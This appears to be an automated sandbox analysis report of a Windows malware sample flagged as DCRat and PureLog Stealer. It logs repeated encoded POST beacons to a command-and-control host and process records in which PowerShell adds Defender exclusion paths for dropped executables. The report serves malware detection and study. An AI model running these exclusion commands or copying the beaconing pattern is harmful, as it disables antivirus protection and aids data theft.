                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                          Jan 8, 2025 19:23:19.060914040 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:18 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                          Jan 8, 2025 19:23:19.061033964 CET401INHTTP/1.1 100 Continue
                                                                          Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 38 20 4a 61 6e 20 32 30 32 35 20 31 38 3a 32 33 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 31 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e [TRUNCATED]
                                                                          Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:23:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-alive<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          11192.168.2.44999837.44.238.25080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:23:45.139482975 CET332OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:23:45.486376047 CET344OUTData Raw: 00 00 04 05 06 00 04 02 05 06 02 01 02 07 01 07 00 06 05 0b 02 02 03 0f 02 0e 0c 02 06 01 01 07 0d 56 06 0c 03 07 07 02 0b 01 06 53 04 0a 04 03 04 07 0e 0e 0f 07 06 07 06 57 06 03 07 52 05 5c 05 01 0c 00 06 0f 01 00 0c 05 0e 52 0d 04 0c 51 06 01
                                                                          Data Ascii: VSWR\RQZX\L~@^b@`Lab\tA|ob_wRc^|MpJ{BxNzJkSR@cdw_~_~V@A{}bL~\S
                                                                          Jan 8, 2025 19:23:45.799418926 CET25INHTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:23:45.937529087 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:45 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          12192.168.2.45001637.44.238.25080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:23:53.866105080 CET332OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:23:54.220882893 CET344OUTData Raw: 00 00 01 07 03 0a 01 04 05 06 02 01 02 0d 01 03 00 01 05 0e 02 01 03 0f 01 03 0e 0d 03 04 03 07 0c 56 06 0f 07 01 03 0b 0e 54 02 04 05 57 07 05 06 50 0c 09 0d 05 05 06 01 0e 03 06 06 57 05 5d 02 05 0e 00 06 56 07 09 0c 52 0e 07 0e 0d 0f 04 02 01
                                                                          Data Ascii: VTWPW]VR[ZRU\L~C|bvryBu[x|it|`lxll[lbJ}kQtIRj_~V@x}~~bS
                                                                          Jan 8, 2025 19:23:54.503763914 CET25INHTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:23:54.634469032 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:54 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          13192.168.2.45001737.44.238.25080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:23:57.387593985 CET332OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:23:57.740959883 CET344OUTData Raw: 05 06 01 00 06 00 01 02 05 06 02 01 02 01 01 05 00 02 05 0b 02 06 03 0d 07 00 0f 00 05 0f 00 09 0c 0f 07 0f 07 02 04 01 0d 0b 07 51 07 01 05 0f 07 02 0b 0c 0f 05 04 57 06 50 05 06 07 0b 04 0f 01 02 0d 0c 04 0f 05 06 0f 06 0c 01 0a 00 0e 51 05 54
                                                                          Data Ascii: QWPQTQ\L}PhNrwrn\wfcUUyw||`Xlo{o^PkmwP`^p}u~V@{SrL}\e
                                                                          Jan 8, 2025 19:23:58.040276051 CET25INHTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:23:58.173022985 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:58 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                          Jan 8, 2025 19:23:58.390559912 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:58 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          14192.168.2.45001837.44.238.25080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:24:01.458509922 CET332OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:24:01.814564943 CET344OUTData Raw: 05 07 04 01 06 0c 04 05 05 06 02 01 02 0c 01 06 00 0a 05 0e 02 03 03 0b 00 06 0e 02 07 57 02 02 0c 05 04 0c 01 04 06 0b 0d 07 04 0b 06 00 04 05 03 03 0d 0e 0d 05 07 06 04 05 07 07 06 04 07 0a 02 00 0f 01 07 01 06 07 0f 0e 0f 00 0d 07 0c 54 06 01
                                                                          Data Ascii: WTU\L~Nh`bMvqiBbu{U|RuvltBc{^{o{o^bIn`C`Il}_~V@{m\~L}
                                                                          Jan 8, 2025 19:24:02.124489069 CET25INHTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:24:02.258925915 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:24:02 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          15192.168.2.45001937.44.238.25080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:24:19.926120043 CET332OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:24:20.283421993 CET344OUTData Raw: 00 0b 04 00 03 0c 01 00 05 06 02 01 02 00 01 06 00 02 05 00 02 07 03 0a 07 07 0f 06 04 00 02 01 0c 00 06 5e 02 54 07 07 0c 0a 06 53 06 02 05 05 04 51 0f 0b 0e 57 06 0b 06 00 04 02 04 0a 04 0f 03 00 0d 0c 07 03 04 51 0d 07 0f 00 0c 03 0e 09 06 07
                                                                          Data Ascii: ^TSQWQTXVVR\L~A~`rwbmb\Ukli`B|Bk]{^l|QJ{^W^Sp@wds_ie~V@{mr}Ly
                                                                          Jan 8, 2025 19:24:20.554718971 CET25INHTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:24:20.685286999 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:24:20 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          16192.168.2.45002037.44.238.25080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:24:30.993206024 CET332OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:24:31.345933914 CET344OUTData Raw: 00 0a 04 03 03 0a 01 06 05 06 02 01 02 04 01 03 00 06 05 00 02 06 03 0b 03 06 0f 01 05 02 02 04 0f 06 04 5e 01 0d 04 06 0f 07 07 05 05 0b 07 03 04 07 0c 0d 0f 54 07 03 07 01 05 06 05 0b 06 0a 02 54 0f 0c 05 51 05 08 0f 06 0b 04 0c 00 0d 51 05 01
                                                                          Data Ascii: ^TTQQS\L}P~`u[var]bfURetot~sxKxlQopz}}cSw|j_~V@@x}b}\}
                                                                          Jan 8, 2025 19:24:31.692440033 CET25INHTTP/1.1 100 Continue


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:13:21:54
                                                                          Start date:08/01/2025
                                                                          Path:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                                          Imagebase:0x60000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1808136284.000000001263C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1660573401.0000000000062000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:4
                                                                          Start time:13:21:57
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline"
                                                                          Imagebase:0x7ff65a8e0000
                                                                          File size:2'759'232 bytes
                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:5
                                                                          Start time:13:21:57
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:6
                                                                          Start time:13:21:57
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC13.tmp" "c:\Windows\System32\CSC745280B6A8F34BD8AA304A2671FFBC0.TMP"
                                                                          Imagebase:0x7ff6479d0000
                                                                          File size:52'744 bytes
                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:22
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:23
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:24
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:25
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\dllhost.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:26
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:27
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:28
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:29
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe'
